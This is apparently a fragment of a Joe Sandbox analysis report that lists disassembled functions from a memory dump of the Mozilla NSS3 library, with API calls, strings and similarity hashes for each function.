LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C762B2C), ref: 6C7667E1

Strings

winUnmapfile1, xrefs: 6C766964
winClose, xrefs: 6C7668C5
winUnmapfile2, xrefs: 6C76698B

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: winClose$winUnmapfile1$winUnmapfile2
API String ID: 3168844106-373099266
Opcode ID: e85ec2f1b47f5361db9a76ec0624a8a6d53c7b83f3e14afa54b7a7a681019db6
Instruction ID: 8966bb76db16a9d110b47effc9afb86cc5d02eae5fca5ca480e5a0f3985d7864
Opcode Fuzzy Hash: e85ec2f1b47f5361db9a76ec0624a8a6d53c7b83f3e14afa54b7a7a681019db6
Instruction Fuzzy Hash: D3A19F35B01210CBDF689F66EA89A693774BF86719B44403CED06DBE41DB34AE01CBD2

Function 6C6F4F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6F4FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6F51BB

Strings

misuse, xrefs: 6C6F51AF
unable to delete/modify user-function due to active statements, xrefs: 6C6F51DF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6F51A5
%s at line %d of [%.10s], xrefs: 6C6F51B4

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: 7c84daee9e81994c49f628402ca03ef4be8d484ff924db1a37e4b8f63b273c61
Instruction ID: 49d7c72dfc9d13bdde6744f5a04f74290b06a859542613cf041ad8bc7b1b9933
Opcode Fuzzy Hash: 7c84daee9e81994c49f628402ca03ef4be8d484ff924db1a37e4b8f63b273c61
Instruction Fuzzy Hash: 0471B07160420A9FEB00CE59CD80BDA77B6BF49308F048524FD299BB45D331ED56CBA5

Function 6C70A630 Relevance: 10.7, APIs: 7, Instructions: 192COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,6C8D1308,?,?,6C706ABD,00000000), ref: 6C70A6B7
LeaveCriticalSection.KERNEL32(?), ref: 6C70A70A
EnterCriticalSection.KERNEL32(?,00000000,6C8D1308,?,?,6C706ABD,00000000), ref: 6C70A73A
LeaveCriticalSection.KERNEL32(?), ref: 6C70A78D
EnterCriticalSection.KERNEL32(?,00000000,6C8D1308,?,?,6C706ABD,00000000), ref: 6C70A7CA
LeaveCriticalSection.KERNEL32(?), ref: 6C70A821
sqlite3_free.NSS3(?,00000000,6C8D1308,?,?,6C706ABD,00000000), ref: 6C70A8A6

Part of subcall function 6C6F9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C70C6FD,?,?,?,?,6C75F965,00000000), ref: 6C6F9F0E
Part of subcall function 6C6F9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C75F965,00000000), ref: 6C6F9F5D

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$sqlite3_free
String ID:
API String ID: 1407842778-0
Opcode ID: 9a4599713c8f02b3fd51f7e515c5ad0905c40e4679d5f4335bc2af18949fad54
Instruction ID: 3526a5f634bfe121f2a3ef163399dbb3d294c9aedc8e5a4b69dec93bbabb1402
Opcode Fuzzy Hash: 9a4599713c8f02b3fd51f7e515c5ad0905c40e4679d5f4335bc2af18949fad54
Instruction Fuzzy Hash: 27617EB5700200CBDB69DF65EA89A6A33B1BF8632DF18513DD40647A41CB39F942CBD2

Function 6C762D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C762D69

Strings

winTruncate1, xrefs: 6C762EBE
winSeekFile, xrefs: 6C762E9C
winTruncate2, xrefs: 6C762EF8
winUnmapfile1, xrefs: 6C762F55
winUnmapfile2, xrefs: 6C762F7F

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-3221253098
Opcode ID: 73c4dac5bfeb3272946767cfb387503c4e9e64ab2690ee3b378d90262b0d83e1
Instruction ID: 5a92f42ef84a98eb149c6d8add044efdcb27f37ef59d5b7cc9230f87d748005e
Opcode Fuzzy Hash: 73c4dac5bfeb3272946767cfb387503c4e9e64ab2690ee3b378d90262b0d83e1
Instruction Fuzzy Hash: 7261B171B002059FDB54CF69D988AAA77B1FF89318F10853CED159BB80DB30AD06CB91

Function 6C778620 Relevance: 10.6, APIs: 7, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

SECITEM_CopyItem_Util.NSS3(00000000,00000000,6C777310,00000000,6C777310,?,?,00000004,?), ref: 6C778684

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

SECITEM_CopyItem_Util.NSS3(00000000,-0000000C,6C777304,?,?,?,00000000,6C777310,?,?,00000004,?), ref: 6C77869F
PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,?,?,?,?,?,00000000,6C777310,?,?,00000004,?), ref: 6C7786D7
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,00000000,6C777310,?,?,00000004,?), ref: 6C778706
PORT_ArenaAlloc_Util.NSS3(00000000,00000018,00000000,6C777310,00000004,00000000,?,6C778A20,00000004,00000000,6C777310,?,?,00000004,?), ref: 6C778656

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000008,00000000,6C777310,00000004,00000000,?,6C778A20,00000004,00000000,6C777310,?,?,00000004,?), ref: 6C778763
PORT_ArenaGrow_Util.NSS3(00000000,6C778A20,?,?,00000000,6C777310,00000004,00000000,?,6C778A20,00000004,00000000,6C777310,?,?,00000004), ref: 6C778795

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$CopyGrow_Item_Value$AllocateCriticalEnterSectionUnlockmemcpy
String ID:
API String ID: 1239214001-0
Opcode ID: edab0757da17ce9ed80277259f892125aa72fc68a5204f4ba0abaa766cbc824c
Instruction ID: 31d47756034f6970cc20ed5eb121c2746c92799eb438975f3b7340698216ea62
Opcode Fuzzy Hash: edab0757da17ce9ed80277259f892125aa72fc68a5204f4ba0abaa766cbc824c
Instruction Fuzzy Hash: 3841F471600218AFEB208F74CE04B6737A9EF52358F15822AEC16AB751E735E904CBF1

Function 6C7BAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C7BAB3E,?,?,?), ref: 6C7BAC35

Part of subcall function 6C79CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C79CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C7BAB3E,?,?,?), ref: 6C7BAC55

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C7BAB3E,?,?), ref: 6C7BAC70

Part of subcall function 6C79E300: TlsGetValue.KERNEL32 ref: 6C79E33C
Part of subcall function 6C79E300: EnterCriticalSection.KERNEL32(?), ref: 6C79E350
Part of subcall function 6C79E300: PR_Unlock.NSS3(?), ref: 6C79E5BC
Part of subcall function 6C79E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C79E5CA
Part of subcall function 6C79E300: TlsGetValue.KERNEL32 ref: 6C79E5F2
Part of subcall function 6C79E300: EnterCriticalSection.KERNEL32(?), ref: 6C79E606
Part of subcall function 6C79E300: PORT_Alloc_Util.NSS3(?), ref: 6C79E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C7BAC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7BAB3E), ref: 6C7BACD7
PORT_Alloc_Util.NSS3(?), ref: 6C7BAD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C7BAD2B

Part of subcall function 6C79F360: TlsGetValue.KERNEL32(00000000,?,6C7BA904,?), ref: 6C79F38B
Part of subcall function 6C79F360: EnterCriticalSection.KERNEL32(?,?,?,6C7BA904,?), ref: 6C79F3A0
Part of subcall function 6C79F360: PR_Unlock.NSS3(?,?,?,?,6C7BA904,?), ref: 6C79F3D3

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 8871a50d3e0623bad1c21d46d8cefd0280fc8b040e5a0a770a413914632d8285
Instruction ID: 75763f1e896428b55189167cf03b12e3c40a70d69ccbae5bc35ce2a8440c3234
Opcode Fuzzy Hash: 8871a50d3e0623bad1c21d46d8cefd0280fc8b040e5a0a770a413914632d8285
Instruction Fuzzy Hash: 6E3129B1E006055FEB00AF69DE459AF7776AF84328B198138E8156B741EB31ED0587A1

Function 6C798C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C798C7C

Part of subcall function 6C839DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DC6
Part of subcall function 6C839DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DD1
Part of subcall function 6C839DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C839DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C798CB0
TlsGetValue.KERNEL32 ref: 6C798CD1
EnterCriticalSection.KERNEL32(?), ref: 6C798CE5
PR_Unlock.NSS3(?), ref: 6C798D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C798D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C798D93

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: a09e1d47aac0acbf48103f2a95008c7275061bdd1559db8309800eb0f3ff916e
Instruction ID: 76c7503d2d4712bcdab489a2ad3acf06ea938367a9810c266db842fc3984b6ef
Opcode Fuzzy Hash: a09e1d47aac0acbf48103f2a95008c7275061bdd1559db8309800eb0f3ff916e
Instruction Fuzzy Hash: 39316A71A01201AFDB109F68EE4579AB7B0BF59318F24013AEA1967F60D731B924C7C1

Function 6C7B8500 Relevance: 10.6, APIs: 7, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C7B95DC,00000000,00000000,00000000,?,6C7B95DC,00000000,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B8517

Part of subcall function 6C7CBE30: SECOID_FindOID_Util.NSS3(6C78311B,00000000,?,6C78311B,?), ref: 6C7CBE44

PORT_NewArena_Util.NSS3(00000800,00000000,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B8585
PORT_ArenaAlloc_Util.NSS3(00000000,00000034,?,00000000,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B859A
SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6C89D8C4,6C7B95D0,?,?,?,00000000,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B85CC
SECOID_GetAlgorithmTag_Util.NSS3(-0000001C,?,?,?,?,?,?,?,00000000,00000000,?,6C797F4A,00000000,?,00000000,00000000), ref: 6C7B85E1
PORT_FreeArena_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,00000000,00000000,?,6C797F4A,00000000,?), ref: 6C7B85F4

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$AlgorithmArena_Tag_$Alloc_ArenaDecodeFindFreeItem_
String ID:
API String ID: 738345241-0
Opcode ID: 98286262c41d093911293775ba111924b29694ac4e8b9622e0393eb77be94b7b
Instruction ID: 79e5f2174df3541264bb871ba89e926110110a492d912c6e2c5cda8109137d3c
Opcode Fuzzy Hash: 98286262c41d093911293775ba111924b29694ac4e8b9622e0393eb77be94b7b
Instruction Fuzzy Hash: 073105A2E4120357E7108D2CDF84B6A2219AB2139CF550673F815F7EC3FB34D99486A6

Function 6C784590 Relevance: 10.6, APIs: 7, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C7845B5

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C7845C9

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7845E6
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C7845F8

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C784647
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C89A0F4,?), ref: 6C78468C
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7846A1

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpymemset
String ID:
API String ID: 1594507116-0
Opcode ID: 04a47b467ff2c7a51fc48ee726e42102fe5889fc9a9b9863c55f173bb15e050c
Instruction ID: ee61dd85001e7a13a95797a2b512f0b433e6cffbe5886d8dac9bf988bbc391bf
Opcode Fuzzy Hash: 04a47b467ff2c7a51fc48ee726e42102fe5889fc9a9b9863c55f173bb15e050c
Instruction Fuzzy Hash: F231F8B1F013149BFF108E58DE657AA36A8DB41318F044038EA05DF785E7B9D40887A2

Function 6C792E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C78E728,?,00000038,?,?,00000000), ref: 6C792E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C792E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C792E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C792E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C792E9E
PR_Unlock.NSS3(?), ref: 6C792EAB
PR_Unlock.NSS3(?), ref: 6C792F0D

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 740dc5fd66bc9a327244c286cf04eff12cb16ca2d8fad6196806f970791ac274
Instruction ID: 2e499803ba7e1f9422d58e2d95a73182a3db05ad09f1e7a5be23b047907b6d09
Opcode Fuzzy Hash: 740dc5fd66bc9a327244c286cf04eff12cb16ca2d8fad6196806f970791ac274
Instruction Fuzzy Hash: 97310579A00105ABEB11AF28ED8887AB779FF1525CB048174ED08C7B12EB31ED64C7E0

Function 6C7C4470 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6C787296,00000000), ref: 6C7C4487
EnterCriticalSection.KERNEL32(?,?,?,6C787296,00000000), ref: 6C7C44A0
PR_Unlock.NSS3(?,?,?,?,6C787296,00000000), ref: 6C7C44BB
SECMOD_DestroyModule.NSS3(?,?,?,?,6C787296,00000000), ref: 6C7C44DA
DeleteCriticalSection.KERNEL32(?,?,?,?,6C787296,00000000), ref: 6C7C4530
free.MOZGLUE(?,?,?,?,?,6C787296,00000000), ref: 6C7C453C
PORT_FreeArena_Util.NSS3 ref: 6C7C454F

Part of subcall function 6C7ACAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C78B1EE,D958E836,?,6C7C51C5), ref: 6C7ACAFA
Part of subcall function 6C7ACAA0: PR_UnloadLibrary.NSS3(?,6C7C51C5), ref: 6C7ACB09

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
String ID:
API String ID: 3590924995-0
Opcode ID: 227170735e9aa4a74d298255a773c4e27bb61a3280cb62afd528e0de64efd3d7
Instruction ID: 522a221ac3a079e225178d8cf4527b128d2bd7f9a1d56c99b5f7a17afda2dc29
Opcode Fuzzy Hash: 227170735e9aa4a74d298255a773c4e27bb61a3280cb62afd528e0de64efd3d7
Instruction Fuzzy Hash: D6315CB4B04A029FDB10AF79D288669B7F0FF05319F014639E89997B01E734E894DBC2

Function 6C7DCEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C7DCD93,?), ref: 6C7DCEEE

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C7DCD93,?), ref: 6C7DCEFC

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
